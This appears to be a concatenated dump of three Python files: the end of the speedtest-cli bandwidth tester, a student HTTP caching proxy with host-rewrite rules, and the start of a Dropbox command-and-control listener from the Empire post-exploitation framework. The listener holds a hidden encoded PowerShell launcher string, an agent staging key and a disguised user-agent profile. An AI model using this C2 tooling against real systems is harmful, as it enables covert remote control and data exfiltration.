for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
f = urlopen(self.url)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError:
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://c.speedtest.net/speedtest-servers-static.php')
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError:
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
print_('Failed to parse list of speedtest.net servers')
sys.exit(1)
servers = {}
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
start = timeit.default_timer()
h.request("GET", urlparts[2])
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('bytes', 1), default=('bits', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
f = urlopen('%s/speedtest/upload.%s' % (args.mini, ext))
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
web_proxy.py | __author__ = 'Brent Berghmans 1334252'
import hashlib
import socket
import re
from threading import Thread
from threading import Lock
import Queue
import os
import sys
import time
from email.utils import formatdate
class HostReplacer:
def __init__(self, file = False):
self.mDict = dict()
if not file:
return
self.readFile(file)
def readFile(self, filename):
try:
with open(filename, 'r') as f:
for line in f:
line = line.strip()
if not line.startswith("#"):
splits = line.split(" ")
if len(splits) == 2:
self.mDict[splits[0]] = splits[1]
else:
print("Error, line contains 3 parameters: " + line + ", skipping this line.")
except:
print("Exception occurred with file.")
def replace(self, string):
if string in self.mDict:
return self.mDict[string]
else:
return string
def substringReplace(self, string):
for key, value in self.mDict.iteritems():
if key.lower() in string.lower() or key.lower() == string.lower():
replaced = string.lower().replace(key, value)
print string + " -> " + replaced
return replaced
return string
class HTTPCache:
def __init__(self):
self.mMD5 = hashlib.md5()
self.mDict = dict()
self.mValues = self.mDict.values()
def generateHash(self, string):
hash = self.generateUniqueHash(string)
self.mDict[string] = hash
self.mValues = self.mDict.values()
return hash
def generateUniqueHash(self, string):
hash = ""
self.mMD5.update(string)
hash = self.mMD5.hexdigest()
self.mMD5 = hashlib.md5()
baseHash = hash
return baseHash
def getHash(self, key):
if key in self.mDict:
return self.mDict[key]
elif key + "/" in self.mDict:
return self.mDict[key + "/"]
else:
return False
def containsKey(self, key):
return key in self.mDict or key + "/" in self.mDict
def containsValue(self, value):
return value in self.mValues
def remove(self, key):
if self.containsKey(key):
self.mDict.pop(key)
elif self.containsKey(key + "/"):
self.mDict.pop(key + "/")
def insert(self, key, value):
self.mDict[key] = value
self.mValues = self.mDict.values()
class HTTPFileCache:
def __init__(self):
self.mCache = HTTPCache()
self.mLock = Lock()
def checkCacheDir(self):
if not os.path.isdir('./cache'):
os.makedirs('./cache')
def fileIsCached(self, url):
#Check if in our memory cache
self.mLock.acquire()
outcome = self.mCache.containsKey(url)
self.mLock.release()
#If not in our memory cache, check file system
if not outcome:
#print "Checking files;"
hash1 = self.mCache.generateUniqueHash(url)
hash2 = self.mCache.generateUniqueHash(url + "/")
print
if os.path.isfile("./cache/" + hash1 + ".tmp"):
#print "Hash1 exists"
self.mCache.insert(url, hash1)
outcome = True
elif os.path.isfile("./cache/" + hash2 + ".tmp"):
#print "Hash2 exists"
self.mCache.insert(url + "/", hash2)
outcome = True
return outcome
def getReadFilePointer(self, url):
#Get hashed name from cache
self.mLock.acquire()
hash = self.mCache.getHash(url)
self.mLock.release()
#open file pointer
f = open('cache/' + hash + ".tmp", 'rb')
return f
def getWriteFilePointer(self, url):
self.checkCacheDir()
hash = ""
#Check if file is cached
test = self.fileIsCached(url)
self.mLock.acquire()
#If cached, get the hash
if test:
hash = self.mCache.getHash(url)
#If not, generate a hash and put in cache
else:
hash = self.mCache.generateHash(url)
self.mLock.release()
#If file exists, we delete it
if not os.path.exists('cache/' + str(hash) + ".tmp"):
f = False
else:
os.remove('cache/' + str(hash) + ".tmp")
#Open write file pointer
f = open('cache/' + str(hash) + ".tmp", 'w+b')
return f
def removeFile(self, url):
test = self.fileIsCached(url)
self.mLock.acquire()
try:
if test:
hash = self.mCache.getHash(url)
if os.path.exists('cache/' + str(hash) + '.tmp'):
os.remove('cache/' + str(hash) + '.tmp')
self.mCache.remove(url)
except:
print "Error occured when deleting file."
self.mLock.release()
#################
# Entry #
# Point #
#################
class ClientHandler:
def __init__(self, clientSocket, clientAddress, fileCache, hostReplacer):
self.mSocket = clientSocket
self.mAddress = clientAddress
self.mRequestQueue = Queue.Queue()
self.mThread = Thread(target=self.doInBackground)
self.mGetRequestRe = re.compile("^(.|\r\n)*?(GET (.)* HTTP\\/1\\.(1|0)\r\n(.|\r\n)+?\r\n\r\n)")
self.mOtherRequestRe = re.compile("^(.|\r\n)*?([a-zA-Z]+? (.)* HTTP\\/1\\.(1|0)\r\n(.|\r\n)+?\r\n\r\n)")
self.mResponseRe = re.compile("(^(HTTP\\/1.1)\\s([0-9]{3})\\s.*\r\n(.+?:.+?\r\n)*\r\n)")
self.mShouldStop = False
self.mCache = fileCache
self.mRedirects = hostReplacer
self.mDebug = False
def runLoop(self):
self.mBuffer = ''
try:
while not self.mShouldStop:
self.mSocket.settimeout(30)
data = self.mSocket.recv(1024)
if not data:
break
self.mBuffer = self.mBuffer + data
#Check if the buffer contains requests
self.parseReceive()
#Send requested files if we have them
self.sendFile()
except socket.timeout:
if len(self.mBuffer.strip()) != 0:
self.sendBadRequest()
else:
self.sendTimeout()
except socket.error:
try:
self.mSocket.close()
#Dont know how to do a "NOP" in python
except socket.error:
x = 10
except:
x = 10
def parseReceive(self):
self.printDebug("In parseReceive")
while True:
#Check if the regex matches
matches = self.mOtherRequestRe.match(self.mBuffer)
if not matches:
break
#This one is the part of the string we need
match = matches.groups()[1]
if not match:
break
else:
self.printDebug("Found a match")
#Make a request based on string
request = HttpRequest(match)
#Edit headers
request.setHeader("User-Agent", "1.1 Brent Proxy")
request.setHeader("Via", "1.1 Brent Proxy")
request.setHeader("X-Forwarded-For", self.mAddress[0])
#If request is valid, add it to list
if not request.mInvalid:
#Try to replace host and request url with hosts file
host = self.mRedirects.substringReplace(request.getHeader("Host"))
url = self.mRedirects.substringReplace(request.getUrl())
request.setHeader("Host", host)
request.setUrl(url)
self.mRequestQueue.put(request)
#Remove this match from buffer, support for more than one request per socket (disabled for safety)
self.mBuffer = self.mBuffer[len(match):]
def sendFile(self):
self.printDebug("In sendFile")
#If we don't need to send files, return
if self.mRequestQueue.empty():
return
#Get some values
request = self.mRequestQueue.get()
path = request.getUrl()
host = request.getHeader("Host")
try:
#Get ip of host
ip = socket.gethostbyname(host)
#Check if file is cached
if self.mCache.fileIsCached(str(ip) + str(path)):
#If so, try to send from cached file (can fail because of deletion of file or busy file pointers)
try:
file = self.mCache.getReadFilePointer(str(ip) + str(path))
self.sendFromCache(request, file)
#if it fails, send from host
except:
print "Exception when sending cached file."
self.sendFromHost(request, ip, host, path)
#If not cached, send from host
else:
self.sendFromHost(request, ip, host, path)
except socket.error as msg:
print msg
self.sendBadRequest()
print "Exception in send."
self.mSocket.close()
self.mShouldStop = True
def sendFromCache(self, request, file):
print "CACHE: " + request.getUrl()
#Init
bufferData = file.read(5024)
self.printDebug(bufferData)
self.mSocket.send(bufferData)
#Keep sending as long as we have data
while bufferData:
bufferData = file.read(5024)
if not bufferData:
break
self.printDebug(bufferData)
self.mSocket.send(bufferData)
file.close()
def sendFromHost(self, request, ip, host, path):
print "HOST: " + request.getUrl()
#Make connection with host
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, 80))
#Edit request header
request.setHeader("Connection", "close")
#We only need to cache get requests
shouldCache = (request.getMethod().lower() == "get")
#Send request to host
query = request.getRequestQuery()
sock.send(query)
#If we need to cache, try to get a file write pointer
file = ""
if shouldCache:
try:
file = self.mCache.getWriteFilePointer(str(ip) + str(path))
except:
shouldCache = False
header = ""
headerFound = False
while True:
#Get data from host
data = sock.recv(5024)
if not data:
break
#Gepland om hier de header aan te passen, maar dit gaf problemen met chunked data, dus heb ik dit weggelaten
if not headerFound:
header = header + data
matches = self.mResponseRe.match(header)
if matches:
headerCopy = header
headerString = matches.groups()[0]
leftover = header[len(headerString):].strip()
header = HttpResponse(headerString)
headerFound = True
self.mSocket.send(headerCopy)
if shouldCache:
file.write(headerCopy)
continue
#Send to socket
self.mSocket.send(data)
#And write to file if we can/must
if shouldCache:
file.write(data)
if shouldCache:
file.close()
try:
if headerFound and header.getResponseCode() != 200 and shouldCache:
self.mCache.removeFile(str(ip) + str(path))
except:
x = 10
def sendNotFound(self):
self.mSocket.send("HTTP/1.1 404 Not Found\r\n\r\n<html><body>404 File not found.</body></html>")
def sendBadRequest(self):
try:
self.mSocket.send("HTTP/1.1 400 Bad Request\r\n\r\n<html><body>400 Bad Request.</body></html>")
self.mSocket.close()
self.mShouldStop = True
except:
print "Exception occurred when sending 400 Bad request."
def sendTimeout(self):
try:
self.mSocket.send("HTTP/1.1 408 Request Timeout\r\n\r\n<html><body>408 Request Timeout.</body></html>")
self.mSocket.close()
self.mShouldStop = True
except:
print "Exception occurred when sending 408 Request Timeout."
def doInBackground(self):
stop = self.runLoop()
self.mSocket.close()
def execute(self):
self.mThread.start()
def join(self):
self.mThread.join()
def printDebug(self, string):
if self.mDebug:
print string
class HttpBase:
def __init__(self):
self.mHeaders = dict()
self.mVersion = ""
def hasHeader(self, key):
return key in self.mHeaders
def getHeader(self, key):
return self.mHeaders[key.lower()]
def setHeader(self, key, value):
self.mHeaders[key.lower()] = value
def setVersion(self, version):
self.mVersion = version
def getVersion(self):
return self.mVersion
def parseHeaderLine(self, string):
#We should be able to split on ":"
if re.match(".*:.*", string):
headerSplit = re.split(":", string)
left = headerSplit[0].strip()
right = ""
#There might be more than one ":", just concatenate
for i in range(1, len(headerSplit)):
if i == 1:
right = headerSplit[i]
else:
right = right + ":" + headerSplit[i]
right = right.strip()
self.setHeader(left, right)
def getHeadersQuery(self):
keys = self.mHeaders.keys()
values = self.mHeaders.values()
toRet = ""
for i in range(0, len(keys)):
if i == len(keys) - 1:
toRet = toRet + keys[i] + ": " + values[i]
else:
toRet = toRet + keys[i] + ": " + values[i] + "\r\n"
return toRet
class HttpResponse(HttpBase):
def __init__(self, text = False):
HttpBase.__init__(self)
self.mBase = HttpBase()
self.mResponseCode = -1
self.mResponseName = ""
self.mInvalid = True
if not text:
return
self.parse(text)
def getResponse(self):
return (self.mResponseCode, self.mResponseName)
def setResponse(self, response):
self.setResponseName(str(response[2]))
self.setResponseCode(response[1])
def getResponseName(self):
return self.mResponseName
def setResponseName(self, responseName):
self.mResponseName = str(responseName)
def getResponseCode(self):
return self.mResponseCode
def setResponseCode(self, code):
self.mResponseCode = int(code)
def parse(self, response):
#Split on \r\n
splits = re.split("\r\n", response)
httpFound = False
for split in splits:
#If we have not found the first line
if not httpFound:
httpFound = self.parseFirstLine(split)
#If we have found the first line
else:
self.parseHeaderLine(split)
self.mInvalid = not httpFound
def parseFirstLine(self, line):
#Check if the line matches the first line of an HTTP request
if re.match("HTTP\\/1\\.(0|1) [0-9]{1,3} .+", line):
versNo = line[5:8].strip()
statusCode = line[9:12].strip()
statusName = line[13:].strip()
self.setVersion(versNo.strip())
self.mResponseCode = int(statusCode)
self.mResponseName = statusName.strip()
return True
else:
return False
def getFirstLineQuery(self):
toRet = ""
toRet = toRet + "HTTP/" + self.getVersion() + " " + str(self.mResponseCode) + " " + str(self.mResponseName)
return toRet
def getResponseQuery(self):
toRet = self.getFirstLineQuery() + "\r\n"
toRet = toRet + self.getHeadersQuery() + "\r\n\r\n"
return toRet
class HttpRequest(HttpBase):
def __init__(self, text = False):
HttpBase.__init__(self)
self.mBase = HttpBase()
self.mUrl = ""
self.mMethod = ""
self.mInvalid = True
if not text:
return
self.parse(text)
def getUrl(self):
return self.mUrl
def setUrl(self, url):
self.mUrl = url
def getMethod(self):
return self.mMethod
def setMethod(self, method):
self.mMethod = method
def parse(self, text):
#Split on \r\n
splits = re.split("\r\n", text)
httpFound = False
for split in splits:
#If we have not found the first line
if not httpFound:
httpFound = self.parseFirstLine(split)
#If we have found the first line
else:
self.parseHeaderLine(split)
self.mInvalid = not httpFound
def parseFirstLine(self, line):
#Check if the line matches the first line of an HTTP request
result = re.match("([a-zA-Z]+) .* HTTP\\/1\\.(1|0)", line)
if result:
self.mMethod = result.group(1)
url = line[len(self.mMethod) + 1:].strip()
versNo = url[len(url) - 9:]
url = url[0: len(url) - len(versNo)].strip()
versNo = versNo[6:].strip()
self.setUrl(url)
self.setVersion(versNo)
return True
else:
return False
def getFirstLineQuery(self):
toRet = ""
toRet = toRet + self.getMethod() + " " + self.getUrl() + " HTTP/" + self.getVersion()
return toRet
def getRequestQuery(self):
toRet = self.getFirstLineQuery() + "\r\n"
toRet = toRet + self.getHeadersQuery()
toRet = toRet + "\r\n\r\n"
return toRet
class HttpServer:
def __init__(self, port, file = False):
if not file:
print "Starting server on port " + str(port)
else:
print "Starting server on port " + str(port) + " with redirect file: " + str(file)
self.mInvalid = False
self.mPort = port
self.mCache = HTTPFileCache()
self.mRedirects = HostReplacer(file)
def open(self):
self.mSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.mSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.mSocket.bind(("localhost", self.mPort))
self.mSocket.listen(5)
def close(self):
self.mSocket.close()
def runServer(self):
self.open()
counter = 0
while True:
clientSocket, clientAddress = self.mSocket.accept()
#Make new handler
clientHandler = ClientHandler(clientSocket, clientAddress, self.mCache, self.mRedirects)
#Start it
clientHandler.execute()
counter = counter + 1
#print "Sockets opened: " + str(counter)
if len(sys.argv) == 3:
if sys.argv[1] == "-p":
port = int(sys.argv[2])
server = HttpServer(port)
server.runServer()
else:
print "Invalid params, aborting."
elif len(sys.argv) == 5:
if sys.argv[1] == "-p" and sys.argv[3] == "-r":
server = HttpServer(int(sys.argv[2]), str(sys.argv[4]))
server.runServer()
elif sys.argv[1] == "-r" and sys.argv[3] == "-p":
server = HttpServer(int(sys.argv[4]), str(sys.argv[2]))
server.runServer()
else:
print "Invalid params, aborting."
else:
print "Invalid params, aborting"
|
dbx.py | from __future__ import print_function
import base64
import copy
import json
import os
import time
import dropbox
from builtins import object
from builtins import str
from typing import List
from pydispatch import dispatcher
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import templating
from empire.server.utils import data_util
from empire.server.database.base import Session
from empire.server.database import models
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Dropbox',
'Author': ['@harmj0y'],
'Description': ('Starts a Dropbox listener.'),
'Category' : ('third_party'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'dropbox'
},
'APIToken' : {
'Description' : 'Authorization token for Dropbox API communication.',
'Required' : True,
'Value' : ''
},
'PollInterval' : {
'Description' : 'Polling interval (in seconds) to communicate with the Dropbox Server.',
'Required' : True,
'Value' : '5'
},
'BaseFolder' : {
'Description' : 'The base Dropbox folder to use for comms.',
'Required' : True,
'Value' : '/Empire/'
},
'StagingFolder' : {
'Description' : 'The nested Dropbox staging folder.',
'Required' : True,
'Value' : '/staging/'
},
'TaskingsFolder' : {
'Description' : 'The nested Dropbox taskings folder.',
'Required' : True,
'Value' : '/taskings/'
},
'ResultsFolder' : {
'Description' : 'The nested Dropbox results folder.',
'Required' : True,
'Value' : '/results/'
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 60
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 10
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'SlackURL' : {
'Description' : 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
def default_response(self):
"""
Returns a default HTTP server page.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, bypasses: List[str]=None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/dbx generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
# host = listenerOptions['Host']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
pollInterval = listenerOptions['PollInterval']['Value']
apiToken = listenerOptions['APIToken']['Value']
baseFolder = listenerOptions['BaseFolder']['Value'].strip('/')
stagingFolder = "/%s/%s" % (baseFolder, listenerOptions['StagingFolder']['Value'].strip('/'))
taskingsFolder = "/%s/%s" % (baseFolder, listenerOptions['TaskingsFolder']['Value'].strip('/'))
